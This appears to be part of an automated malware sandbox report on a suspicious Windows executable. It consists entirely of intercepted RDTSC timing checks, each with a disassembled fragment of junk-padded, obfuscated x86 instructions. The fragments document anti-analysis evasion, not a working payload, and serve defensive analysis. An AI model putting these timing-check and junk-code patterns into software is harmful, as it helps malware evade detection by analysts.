Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 163A82D second address: 163A831 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1646936 second address: 1646946 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 je 00007F10C4818126h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1646946 second address: 164694C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1646AF7 second address: 1646B17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F10C4818124h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1646B17 second address: 1646B33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4816E08h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 163C733 second address: 163C73D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F10C481811Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 163C73D second address: 163C7D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push ecx 0x0000000a call 00007F10C4816E03h 0x0000000f jnl 00007F10C4816DF6h 0x00000015 pop ebx 0x00000016 pop edi 0x00000017 push dword ptr fs:[00000000h] 0x0000001e mov bl, D3h 0x00000020 mov dword ptr fs:[00000000h], esp 0x00000027 mov ebx, dword ptr [ebp+122D31EBh] 0x0000002d mov eax, dword ptr [ebp+122D171Dh] 0x00000033 push 00000000h 0x00000035 push edx 0x00000036 call 00007F10C4816DF8h 0x0000003b pop edx 0x0000003c mov dword ptr [esp+04h], edx 0x00000040 add dword ptr [esp+04h], 0000001Ch 0x00000048 inc edx 0x00000049 push edx 0x0000004a ret 0x0000004b pop edx 0x0000004c ret 0x0000004d push FFFFFFFFh 0x0000004f push 00000000h 0x00000051 push edi 0x00000052 call 00007F10C4816DF8h 0x00000057 pop edi 0x00000058 mov dword ptr [esp+04h], edi 0x0000005c add dword ptr [esp+04h], 0000001Bh 0x00000064 inc edi 0x00000065 push edi 0x00000066 ret 0x00000067 pop edi 0x00000068 ret 0x00000069 push eax 0x0000006a push eax 0x0000006b push edx 0x0000006c pushad 0x0000006d jnp 00007F10C4816DF6h 0x00000073 push eax 0x00000074 push edx 0x00000075 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 163C7D3 second address: 163C7D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 163C7D8 second address: 163C7EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F10C4816DFFh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 164AFB5 second address: 164AFBB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 164AFBB second address: 164AFD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F10C4816E01h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 164AFD0 second address: 164AFD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 164AFD4 second address: 164AFE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 164AFE3 second address: 164AFE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 164AFE7 second address: 164AFEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 164FB70 second address: 164FB74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 164FB74 second address: 164FB7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 164FB7A second address: 164FB90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jbe 00007F10C4818116h 0x0000000d pop edi 0x0000000e jo 00007F10C481811Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1650543 second address: 1650550 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jl 00007F10C4816DFCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1650550 second address: 16505A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F10C4818125h 0x00000009 pushad 0x0000000a jmp 00007F10C4818123h 0x0000000f jne 00007F10C4818116h 0x00000015 push eax 0x00000016 pop eax 0x00000017 jng 00007F10C4818116h 0x0000001d popad 0x0000001e popad 0x0000001f pushad 0x00000020 push edi 0x00000021 push ebx 0x00000022 pop ebx 0x00000023 jp 00007F10C4818116h 0x00000029 pop edi 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e jc 00007F10C4818116h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16505A2 second address: 16505A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16505A6 second address: 16505AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16509F0 second address: 16509F6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16509F6 second address: 16509FB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16509FB second address: 1650A01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16539BF second address: 16539F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C481811Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d push edi 0x0000000e pop edi 0x0000000f pop esi 0x00000010 jnp 00007F10C481812Fh 0x00000016 jmp 00007F10C4818123h 0x0000001b jg 00007F10C4818116h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16539F5 second address: 16539FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16539FB second address: 16539FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 165A1F7 second address: 165A1FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1658ACE second address: 1658B2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007F10C481811Ch 0x0000000f popad 0x00000010 jbe 00007F10C4818123h 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007F10C481811Bh 0x0000001d popad 0x0000001e pushad 0x0000001f jbe 00007F10C481812Bh 0x00000025 jmp 00007F10C4818125h 0x0000002a jmp 00007F10C4818127h 0x0000002f pushad 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1658B2F second address: 1658B3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1658C81 second address: 1658C89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1658C89 second address: 1658C9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F10C4816DFEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1658C9B second address: 1658CA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1658CA1 second address: 1658CA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1658CA7 second address: 1658CC0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F10C4818121h 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1658CC0 second address: 1658CC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1658CC6 second address: 1658CCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1658CCA second address: 1658CCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1658CCE second address: 1658CE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F10C481811Ch 0x0000000f rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1658FDC second address: 1658FF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push edi 0x00000006 pop edi 0x00000007 jmp 00007F10C4816DFDh 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1658FF1 second address: 1658FFB instructions: 0x00000000 rdtsc 0x00000002 jc 00007F10C481811Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1658FFB second address: 1659013 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007F10C4816DF8h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 jc 00007F10C4816DF6h 0x00000017 pop eax 0x00000018 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1659013 second address: 1659019 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1659019 second address: 1659035 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F10C4816E08h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16591A6 second address: 16591C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C481811Bh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jnl 00007F10C4818116h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 165947D second address: 1659496 instructions: 0x00000000 rdtsc 0x00000002 je 00007F10C4816E0Bh 0x00000008 jmp 00007F10C4816DFFh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16595C3 second address: 16595EB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F10C4818124h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F10C4818122h 0x00000011 js 00007F10C4818116h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16595EB second address: 16595EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 165990D second address: 1659913 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1659913 second address: 1659917 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1659A35 second address: 1659A4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop eax 0x00000007 je 00007F10C481811Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1659A4E second address: 1659A52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1659A52 second address: 1659A6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4818129h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16066D1 second address: 16066D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16066D5 second address: 16066D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16586F3 second address: 16586FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16586FC second address: 1658717 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F10C4818127h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1658717 second address: 1658767 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4816E06h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F10C4816DFDh 0x0000000f jmp 00007F10C4816E08h 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push esi 0x00000019 push edx 0x0000001a pop edx 0x0000001b pop esi 0x0000001c push eax 0x0000001d push edx 0x0000001e je 00007F10C4816DF6h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1658767 second address: 1658779 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C481811Ch 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1658779 second address: 1658789 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F10C4816E02h 0x00000008 jnl 00007F10C4816DF6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1658789 second address: 165879B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jns 00007F10C4818116h 0x0000000c jc 00007F10C4818116h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 165879B second address: 16587A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 165F8C2 second address: 165F8C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 165F8C6 second address: 165F943 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jmp 00007F10C4816E05h 0x00000010 jo 00007F10C4816DF6h 0x00000016 jmp 00007F10C4816E06h 0x0000001b popad 0x0000001c jne 00007F10C4816DFEh 0x00000022 jmp 00007F10C4816E05h 0x00000027 popad 0x00000028 jo 00007F10C4816E14h 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 popad 0x00000032 jmp 00007F10C4816E02h 0x00000037 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 165E764 second address: 165E776 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F10C481811Dh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 161EF83 second address: 161EF8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 161EF8B second address: 161EF9C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jng 00007F10C481811Eh 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 161EF9C second address: 161F00F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 nop 0x00000006 mov dx, 4F1Fh 0x0000000a jo 00007F10C4816E0Fh 0x00000010 jmp 00007F10C4816E09h 0x00000015 lea eax, dword ptr [ebp+12480C7Bh] 0x0000001b push 00000000h 0x0000001d push edx 0x0000001e call 00007F10C4816DF8h 0x00000023 pop edx 0x00000024 mov dword ptr [esp+04h], edx 0x00000028 add dword ptr [esp+04h], 00000016h 0x00000030 inc edx 0x00000031 push edx 0x00000032 ret 0x00000033 pop edx 0x00000034 ret 0x00000035 mov edx, dword ptr [ebp+122D2D64h] 0x0000003b nop 0x0000003c jmp 00007F10C4816E08h 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 push edi 0x00000045 push edi 0x00000046 pop edi 0x00000047 pop edi 0x00000048 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 161F00F second address: 161F015 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 161F0CF second address: 161F0E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F10C4816DFEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 161F629 second address: 161F62D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 161F62D second address: 161F631 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 161F631 second address: 161F637 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 161FADC second address: 161FAFC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4816DFCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b js 00007F10C4816E02h 0x00000011 jng 00007F10C4816DFCh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 162038C second address: 1620390 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1620390 second address: 16066D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 jmp 00007F10C4816E02h 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007F10C4816DF8h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 00000014h 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 or dword ptr [ebp+122D29F5h], edi 0x0000002e mov edx, dword ptr [ebp+122D33D6h] 0x00000034 call dword ptr [ebp+124594CCh] 0x0000003a jg 00007F10C4816E19h 0x00000040 pushad 0x00000041 push ebx 0x00000042 pop ebx 0x00000043 push esi 0x00000044 pop esi 0x00000045 popad 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007F10C4816DFBh 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 165EACB second address: 165EAD0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 165EC56 second address: 165EC79 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F10C4816DFAh 0x00000008 pushad 0x00000009 popad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jp 00007F10C4816DFCh 0x00000012 js 00007F10C4816DF6h 0x00000018 pop edx 0x00000019 pop eax 0x0000001a jc 00007F10C4816E0Dh 0x00000020 push edi 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 165EDCD second address: 165EDD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 166502E second address: 1665037 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1665037 second address: 166503B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 166503B second address: 1665058 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4816DFFh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007F10C4816E02h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1665058 second address: 1665075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F10C4818116h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F10C4818120h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1663C9A second address: 1663C9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1663E0F second address: 1663E1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F10C4818116h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16642C8 second address: 16642D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F10C4816DF6h 0x0000000a je 00007F10C4816DF6h 0x00000010 rdtsc
